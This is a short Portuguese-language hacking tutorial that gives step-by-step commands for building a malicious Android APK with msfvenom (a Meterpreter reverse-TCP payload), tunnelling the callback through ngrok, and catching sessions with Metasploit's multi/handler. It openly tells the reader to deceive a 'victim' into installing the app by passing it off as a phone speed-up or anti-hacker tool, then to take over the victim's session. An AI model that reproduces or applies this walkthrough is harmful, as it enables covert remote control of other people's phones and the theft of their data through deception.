

Requesitos:

- 1 ~> Ngrok instaldo
- 2 ~> Metasploit-Framework instalado

Tutorial:

Primeiramente abra uma seção e execute o seguinte comando:

\$./ngrok tcp 4444

Tudo ok!, abra uma nova seção e crie um aplicativo malicioso com o MsfVenom, digite o seguinte comando:

\$ msfvenom -p android/meterpreter/reverse_tcp LHOST=(Volte na aba do ngrok e digite o Ip dele aqui) LPORT=4444 --platform android R o /sdcard/(Nome do Apk).apk

Agora que você já tem sua payload, vá no seu gerenciador de arquivos e procure seu aplicativo elevai estar no diretório principal do seu dispositivo.

Agora sua Engenharia Social vai entrar em cena!, convença a sua vítima a instalar o aplicativo, inventealguma coisa, diga que ele serve pra deixar o celular mais rápido, ou até mesmo que ele protege de hackers.

Depois da vítima ter instalado o apk, inicie o Metasploit-Framework...

\$ msfconsole



Depois de iniciar iremos configurar o apk malicioso usando o HANDLER, digite o seguinte:

\$ use exploit/multi/handler

Vamos usar o Meterpreter para configurar a conexão reversa com o aplivativo.

\$ set payload android/meterpreter/reverse_tcp

Agora vamos configurar o IP e a Porta de conexão com a Payload.

- \$ set LHOST 127.0.0.1 \$ set LPORT 4444 \$ show options

- \$ set ExitOnSession false

Feito tudo isso, iremos executar HANDLER para fazer a conexão reversa com a vítima usaremos o seguinte comando:

\$ exploit -j

Vamos listar as seções ativas:

\$ sessions

Que tal entra em uma delas?:

\$ sessions -i (ID DA SEÇÃO)

Dúvidas de quais comandos usar na vítima?:

\$ help

By: Cybe®Bot_13

Hacking World